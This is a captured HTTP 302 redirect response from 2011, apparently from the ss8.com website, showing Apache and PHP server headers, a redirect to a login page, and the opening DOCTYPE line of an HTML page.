HTTP/1.1 302 Moved Temporarily Date: Thu, 13 Oct 2011 11:04:46 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.ss8.comlogin.php Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 16791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">